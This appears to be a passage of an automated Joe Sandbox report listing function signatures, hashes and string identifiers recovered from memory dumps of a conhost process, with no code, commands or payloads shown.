                                                                  • Instruction ID: cba58f7aae1fef502c7737a0110eac5837940fdaf72cd210e9443bb2f7c51ae0
                                                                  • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction Fuzzy Hash: 32015735704A9082EA60DB1BAA9875A66A1F788FC0F484134DF9A43B54DF38C9CA8B40
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: 6ed351fc5884092d464b266d494cf421413f1d755a0bdebb249af24049bf050c
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: 0F012535711B5482EB349B2BEA9CB1A67A1BB58B55F080428CB8D06F64EF3DD0D88B00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: cc15dfa73f35049a76f4bd2658b5b809932f1e334a1ab5e39ac77a48dd49227e
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: D751B632B11A0087EF56EF1AD58CB693795F344B99F528124DBD647789DB34C8C2C709
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 987445dec8f4b9f7afe52ccb5004dd6d990f796392ba8b7ccc15756544382786
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: C1519232711A108BEB74CB1AE688F5B3B95F344FA8F598124DB0643B98EB35D9C1CB04
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: 1a0bbf98a2c23ce77fe5efbb94284787a162dec398c8c3bd507efe69019999bc
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: 57319131A01A4097EB16FF1AE98C75937A4F344BD9F568014EFD647789DB38C982C709
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                  • String ID: csm$f
                                                                  • API String ID: 2395640692-629598281
                                                                  • Opcode ID: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                                  • Instruction ID: b6a81c66fae93e9dbf9bef855583f8f803501d0b96ed760ae7a162ad1717c719
                                                                  • Opcode Fuzzy Hash: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                                  • Instruction Fuzzy Hash: 07315031301B50D6E735DF1AEA88B1B3B94F744FA8F198114AF5647B98DB38D981CB44
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                  • String ID: \\?\
                                                                  • API String ID: 2719912262-4282027825
                                                                  • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction ID: 22f9254db42dd852a054fb0c3de144e15028e8f6481dd59549d77506837a9453
                                                                  • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction Fuzzy Hash: 2DF0447230469192EB708B2AF6D879A6761F754F98F844020DB4D46E94DF7CDAC9CF00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction ID: ab1bc64c037289a28b853d4619410e747e896a56f399b9c3fb967ea78709ae70
                                                                  • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                                  • Instruction Fuzzy Hash: 1CF0627131161085EF348B2AE9C876A5320BB44BA5F580215C76A459E4CF3DC4C9CF04
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: 71705978f6cb1ce3fa542591803e325a567a18d238eced58efbf884a7de0de41
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 81F08271304BD081EA208B2BBA8815A6665BB48FC0F085030EF6A07F18DF3CD4D68B00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction ID: c90d07372c111572b9ee9fa2afbdf04e9bbbf08b0e3b9012b3eb85df31a1fa27
                                                                  • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                                  • Instruction Fuzzy Hash: D402B732319B8486EB60CB5AE59475BBBA1F384B94F145115EB8E87BA9DF7CC484CF00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: cdac216a2e9814a7210d9ed28c64e02f1d062e686a466d2a1ad5662db5494def
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: 9D61B636319A44C6E674CB1EE69871ABBA0F388B94F541115EB8E47FA8DB7CC585CF00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: e597fbee8606c28061fd988be53fa48057de39d88120f6339bf0b4f450caaca6
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 7B1191A2E18A00C2FB56357DE6FF36B13506B94375F1B4634ABEE062DE8B3888C4C100
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: aec274d7b9c52a4f7c2e00eba4a071199fa9667992659bb1ae8f251f1e0d0b59
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: C2117372B10E3141FB74526EE7DD36912826B78378F484635AB6A0AED6DA34E8C54E00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CallEncodePointerTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3544855599-2084237596
                                                                  • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction ID: 0b199adfdc80bc82c8701da214b21600f841cf8b3c9ce20d85270181f44cc703
                                                                  • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                                  • Instruction Fuzzy Hash: AD618C73701B848AE720DF6AD584B9E7BA1F348B88F084215EF5917F99DB39C585CB00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: a9fa598c8034417a97bc80aeb75d1609e25bb7154e935cb43b4378e436ebbd15
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: 51519F3290138086EB75AF2A96CC35977A4F354BA8F144116DBD94BBD6CB38D4E2CB0C
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: da8709e21cff098c159e4ef2c0cfe91af20e4aa60a643dab7bc207e55f950e2d
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: A4517B32700380C6EB74AB1B9688B6E7AA4F755F94F18421ADB8987F95CB38D4D1CF04
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                  • String ID: pid_
                                                                  • API String ID: 517849248-4147670505
                                                                  • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction ID: 2e1164a73125c8df79ad022adbc378194918dc516afef4ca300b8d1ff19578e6
                                                                  • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                                  • Instruction Fuzzy Hash: 50116031314A5191FB70973BEA8979B5AA0F748B80F9841259B4983F94EF38C995CB44
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: f63fa51d7ac86e5a8a806057eb7daf3c7bcbb633d08fc35e2272ba8b6f0d7ecf
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: 4ED12232B04B9089E721CFAAD68479C3BB1F754B98F044216DF5D97FA9DA34D486CB40
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: 03e2f8987b7b3cbe52326c4479113de5a24e170e098d0b603ea798d99535c99a
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: 37015E36600AA0C6D764DF6BE98814ABBA0F78CF80F084425EF5A43B19DF38D091CB40
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002408A2A2D9B), ref: 000002408A2A2ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002408A2A2D9B), ref: 000002408A2A2F57
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: be321a534fd534bc05a886d8d5d864aed2f9582f8c95a6bb206268135cf946ec
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: 4391BE7270066089F7709F6E96C87AD6BA4F354B88F544109DF0AA7EA5DB34E8C2CF00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: 1279204164977c886c66c13ab335537950eda136c4da342761a90b7ff87db7fc
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: BB716F3630068146EB75DA2F9A887EBBB94B785F84F480016DE0A57F99DE34C5848B40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: cc2454ad6ea742706e5d6021bc5e9c7e58a20a4b05696d38448617acd58f2851
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: A1618C33A05B84CAEB21EF69D58839D77A0F348B9CF144215EF8917B99DB38D496C708
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmp
